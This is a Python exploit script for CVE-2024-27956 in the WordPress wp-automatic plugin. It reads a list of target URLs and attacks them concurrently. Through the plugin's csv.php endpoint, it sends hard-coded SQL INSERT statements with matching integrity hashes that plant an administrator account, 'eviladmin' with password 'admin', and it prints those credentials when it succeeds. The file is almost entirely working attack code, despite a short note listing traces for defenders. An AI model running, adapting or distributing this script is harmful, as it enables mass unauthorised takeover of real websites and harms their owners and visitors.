import argparse
import requests
import sys
import urllib3
import os
from sys import stdout
from colorama import Fore, init
from concurrent.futures import ThreadPoolExecutor, as_completed
# Colorama: reset colour after every write so a coloured prefix never bleeds
# into the next line.
init(autoreset=True)
# makeRequest() below turns certificate verification off (session.verify = False),
# which would otherwise print one InsecureRequestWarning per HTTPS request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def clear():
    """Clear the terminal through the shell: ``clear`` on POSIX, ``cls`` elsewhere."""
    command = 'cls'
    if os.name == 'posix':
        command = 'clear'
    os.system(command)
def banners():
    """Clear the screen, then write the ASCII-art banner and the CVE tag to stdout."""
    clear()
    red = Fore.LIGHTRED_EX
    yellow = Fore.YELLOW
    # 24-bit pink bullet used in front of the AUTHOR/GITHUB rows
    bullet = "\x1b[38;2;255;20;147m• "
    art = (
        " \n",
        red + " ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ███████╗ █████╗ ███████╗ ██████╗ \n",
        red + "██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗╚════██║██╔══██╗██╔════╝██╔════╝ \n",
        red + "██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗ █████╔╝ ██╔╝╚██████║███████╗███████╗ \n",
        red + "██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ██╔╝ ╚═══██║╚════██║██╔═══██╗\n",
        red + "╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████╗ ██║ █████╔╝███████║╚██████╔╝\n",
        red + " ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚════╝ ╚══════╝ ╚═════╝ \n",
        yellow + "═════════════╦═════════════════════════════════╦══════════════════════════════\n",
        yellow + "╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n",
        yellow + "║ " + bullet + Fore.GREEN + "AUTHOR " + Fore.RED + " |" + Fore.LIGHTWHITE_EX + " PARI MALAM " + yellow + "║\n",
        yellow + "╔════════════════════════════════════════════════════════════════════════════╝\n",
        yellow + "║ " + bullet + Fore.GREEN + "GITHUB " + Fore.RED + " |" + Fore.LIGHTWHITE_EX + " " + yellow + "║\n",
        yellow + "╚════════════════════════════════════════════════════════════════════════════╝\n",
    )
    for line in art:
        stdout.write(line)
    print(f"{Fore.YELLOW}[CVE-2024-27956] - {Fore.GREEN}Wordpress SQLI-2-RCE\n")
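def makeRequest(payload, hash, url):
    """POST the ``q``/``auth``/``integ`` form to *url* and return the response.

    Args:
        payload: value sent as the ``q`` form field.
        hash: value sent as the ``integ`` form field (parameter name kept for
            callers even though it shadows the builtin).
        url: full endpoint URL to POST to.

    Returns:
        The ``requests.Response`` when the request completes without an HTTP
        error status; ``None`` (after printing the failure) on any
        ``RequestException``, including the one ``raise_for_status()`` raises.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }
    data = {
        'q': payload,
        'auth': b'\0',
        'integ': hash
    }
    # The Session is a context manager: closing it releases its connection pool
    # on every exit path (the previous version never closed it). The author
    # disables certificate verification, so HTTPS peers are not authenticated.
    with requests.Session() as session:
        session.verify = False
        try:
            response = session.post(url, data=data, headers=headers)
            response.raise_for_status()
            return response
        except requests.exceptions.RequestException as e:
            print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Failed: {e}{Fore.RESET}")
            return None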
def helpUsage():
    """Print the usage hint and exit with status 1 (not called elsewhere in this file)."""
    hints = (
        "[+] You must run the exploit passing the Wordpress URL.",
        "[+] Example: python exploit.py -f urls.txt",
    )
    for hint in hints:
        print(hint)
    sys.exit(1)
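def verifyArgs():
    """Parse the command line and load the target list from the given file.

    Reads ``-f/--file`` (required) and ``-t/--threads`` (default 5) from
    ``sys.argv``. Every non-blank line of the file is one target; surrounding
    whitespace is stripped and ``http://`` is prepended to entries that carry
    neither an ``http://`` nor an ``https://`` scheme.

    Returns:
        ``(urls, threads)`` -- the normalised target list and the thread count.

    Exits:
        status 1 when the file is missing or unreadable; status 2 (argparse)
        when arguments are invalid or ``--threads`` is below 1.
    """
    parser = argparse.ArgumentParser(description="Exploit for CVE-2024-27956")
    parser.add_argument('-f', '--file', type=str, required=True, help='File containing URLs/IPs, one per line')
    parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads to use for concurrent requests (default: 5)')
    args = parser.parse_args()
    # ThreadPoolExecutor rejects max_workers <= 0 with a ValueError deep in main();
    # report it up front as a usage error instead.
    if args.threads < 1:
        parser.error("--threads must be at least 1")
    try:
        with open(args.file, 'r', encoding='utf-8') as f:
            raw_lines = f.read().splitlines()
    except FileNotFoundError as e:
        print(f"File '{args.file}' not found: {e}")
        sys.exit(1)
    except (OSError, UnicodeDecodeError) as e:
        print(f"Error reading file '{args.file}': {e}")
        sys.exit(1)
    # Blank or whitespace-only lines used to become a bare 'http://' target;
    # skip them, and trim each remaining line before checking its scheme.
    urls = []
    for line in raw_lines:
        target = line.strip()
        if not target:
            continue
        if not target.startswith(('http://', 'https://')):
            target = f'http://{target}'
        urls.append(target)
    return urls, args.threads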
def exploitWordpress(url: str) -> bool:
    """Run the two-request CVE-2024-27956 sequence against *url*; True on success.

    Both requests are sent by makeRequest() to
    ``/wp-content/plugins/wp-automatic/inc/csv.php`` under *url*, each with a
    hard-coded SQL statement as ``q`` and a hard-coded ``integ`` value. The
    first inserts a ``wp_users`` row for ``eviladmin`` (the target URL itself is
    stored as ``user_url``); the second inserts the ``wp_capabilities`` usermeta
    row that marks that user as administrator. Returns False, after printing the
    reason, when a request fails, when the server answers with "Tampered query",
    "invalid login" or "login required", or when the first response lacks "DATE".

    Defender note: what this leaves behind is POST traffic to that csv.php path
    carrying ``q``/``auth``/``integ`` form fields, plus a new ``wp_users`` /
    ``wp_usermeta`` pair for the login ``eviladmin``.
    """
    exploit_path = '/wp-content/plugins/wp-automatic/inc/csv.php'
    print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.GREEN}- Attempting to exploit{Fore.RESET}")
    # Construct SQL query with dynamic URL
    # The user_pass value is a fixed phpass hash; per the success message at the
    # bottom it corresponds to the password 'admin'.
    create_user_payload = f"INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', '{url}', '2024-04-30 16:26:43', 0, 'eviladmin')"
    # NOTE(review): looks like an integrity value the endpoint checks against q
    # (the "Tampered query" response below) -- not derivable from this file.
    create_user_hash = "09956ea086b172d6cf8ac31de406c4c0"
    response = makeRequest(create_user_payload, create_user_hash, url + exploit_path)
    if response is None:
        return False
    if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
        print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Payload Error: {response.text.strip()}{Fore.RESET}")
        return False
    # "DATE" in the body is treated as the vulnerable signature; why the endpoint
    # emits it cannot be told from this file.
    if "DATE" not in response.text:
        print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Not Vulnerable{Fore.RESET}")
        return False
    # Second request (give admin permissions)
    give_permission_payload = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"
    give_permission_hash = "bd98494b41544b818fa9f583dadfa2bb"
    response = makeRequest(give_permission_payload, give_permission_hash, url + exploit_path)
    if response is None:
        return False
    if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
        print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Payload Error: {response.text.strip()}{Fore.RESET}")
        return False
    # Note: the second response is not checked for a success marker; reaching
    # here only means it was not one of the three error strings above.
    print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.GREEN}Exploit completed successfully: eviladmin:admin{Fore.RESET}")
    return True
def main():
    """Load targets via verifyArgs() and run exploitWordpress() on each in a thread pool."""
    urls, threads = verifyArgs()
    with ThreadPoolExecutor(max_workers=threads) as executor:
        pending = [executor.submit(exploitWordpress, target) for target in urls]
        # result() re-raises any exception a worker raised, so one failing
        # target aborts the loop (the pool still drains on exit from the with).
        for done in as_completed(pending):
            done.result()
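# Script entry point. The guard previously compared a bare `name` against
# "main"; `name` is not defined anywhere in this file, so it raised NameError
# on import. The standard `__name__` check is what was intended.
if __name__ == "__main__":
    banners()
    main()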